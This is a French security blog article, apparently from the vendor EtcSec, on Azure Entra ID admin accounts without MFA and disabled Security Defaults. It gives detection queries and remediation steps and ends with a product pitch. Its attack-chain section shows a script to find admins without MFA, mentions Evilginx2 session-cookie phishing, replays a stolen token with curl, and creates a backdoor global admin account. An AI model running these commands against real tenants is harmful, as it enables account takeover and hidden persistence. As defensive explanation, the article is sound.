Qu'est-ce que la Sécurité des Identités Azure ?
Azure Entra ID est le backbone d'identité pour Microsoft 365, Azure et des milliers d'applications SaaS. Quand les contrôles d'identité sont mal configurés, les attaquants peuvent contourner le MFA, escalader les privilèges et prendre le contrôle d'environnements cloud avec rien de plus qu'un mot de passe volé.
Les deux mauvaises configurations d'identité Azure les plus critiques sont le MFA non appliqué pour les administrateurs et les Security Defaults désactivés. Les deux représentent un échec fondamental de la première ligne de défense — trivialement exploitables avec des kits de phishing disponibles.
Comment ca Fonctionne
La sécurité des identités Azure repose sur deux contrôles fondamentaux :
MFA (Authentification Multifacteur) exige un second facteur — application mobile, clé FIDO2, SMS — en plus du mot de passe. Même si un attaquant obtient un mot de passe via phishing, le MFA empêche l'authentification sans le second facteur.
Security Defaults sont les paramètres de sécurité de base de Microsoft pour les tenants Entra ID — un ensemble préconfiguré de politiques qui activent le MFA pour les admins, bloquent l'authentification legacy et exigent le MFA pour les connexions risquées. Ils sont gratuits, activés en un seul clic.
Quand aucun des deux n'est configuré, tout compte admin est à un email de phishing d'une compromission totale.
La Chaine d'Attaque
Etape 1 - Identifier les Comptes Admin Sans MFA
Connect-MgGraph -Scopes "Directory.Read.All", "UserAuthenticationMethod.Read.All"
$adminRoleIds = (Get-MgDirectoryRole | Where-Object DisplayName -match "Admin").Id
foreach ($roleId in $adminRoleIds) {
Get-MgDirectoryRoleMember -DirectoryRoleId $roleId | ForEach-Object {
$methods = Get-MgUserAuthenticationMethod -UserId $_.Id
if ($methods.Count -le 1) {
[PSCustomObject]@{
Utilisateur = $_.AdditionalProperties.userPrincipalName
MethodesMFA = $methods.Count
}
}
}
}
Etape 2 - Phishing du Compte Admin
Les attaquants utilisent des proxies de phishing adversary-in-the-middle (AiTM) comme Evilginx2 pour intercepter non seulement le mot de passe mais aussi le cookie de session — contournant même les comptes protégés par MFA.
Etape 3 - Authentification en tant qu'Admin
# Utilisation du cookie de session volé — contourne entièrement le MFA
curl -H "Authorization: Bearer {token_vole}" https://graph.microsoft.com/v1.0/me
Etape 4 - Etablir une Persistance
New-MgUser -DisplayName "Support IT" -UserPrincipalName "[email protected]" `
-PasswordProfile @{Password="BackdoorP@ss123!"} -AccountEnabled $true
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $globalAdminRoleId `
-OdataId "https://graph.microsoft.com/v1.0/directoryObjects/$newUserId"
Détection
Logs de Connexion Microsoft Entra
| Signal | Ce qu'il faut surveiller |
|---|---|
| Résultat MFA | Connexions avec mfaDetail: null pour les comptes admin |
| Réutilisation de token de session | Même token utilisé depuis différentes IPs rapidement |
| Niveau de risque | Connexions à risque élevé completées sans re-challenge MFA |
Requete SIEM (Elastic KQL)
azure.signinlogs.properties.authentication_details.authentication_method: "Previously satisfied" AND
azure.signinlogs.properties.user_roles: "*Admin*" AND
azure.signinlogs.properties.risk_level_during_sign_in: ("high" OR "medium")
💡 Conseil : Activez Microsoft Entra ID Identity Protection. Il détecte le phishing AiTM, le voyage impossible, les anomalies de token et d'autres signaux d'attaque basés sur l'identité en temps réel.
Remédiation
⚠️ Critique : Activez les Security Defaults ou le MFA Accès Conditionnel immédiatement. C'est l'action à plus fort impact que vous pouvez prendre pour la sécurité des identités Azure.
Option 1 : Activer les Security Defaults (Sans Licence Requise)
Entra ID > Propriétés > Gérer les Security Defaults > Activer les Security Defaults = Oui
Option 2 : MFA Accès Conditionnel (Recommandé pour P1/P2)
Politique : Exiger MFA pour Tous les Admins
Utilisateurs : Tous les utilisateurs avec un rôle admin
Applications cloud : Toutes les applications cloud
Contrôles : Exiger MFA + Appareil conforme
Imposer le MFA Résistant au Phishing pour les Admins
Entra ID > Méthodes d'Authentification > Clés de Sécurité FIDO2 = Activé
Accès Conditionnel : Exiger la robustesse d'authentification = MFA résistant au phishing
(Pour Admin Global, Admin de Rôle Privilégié, Admin de Sécurité)
Comment EtcSec Détecte Cela
MFA_NOT_ENFORCED_ADMINS identifie les comptes admin sans méthodes MFA enregistrées — à un email de phishing d'une compromission totale du tenant.
AZ_SECURITY_DEFAULTS_DISABLED signale les tenants où les Security Defaults sont désactivés et aucune politique d'Accès Conditionnel équivalente n'a été configurée.
ℹ️ Note : EtcSec audite les contrôles d'identité Azure automatiquement. Lancez un audit gratuit pour voir quels comptes admin de votre tenant manquent de MFA.
Articles connexes : Failles d'Accès Conditionnel Azure | Accès Privilégié Azure
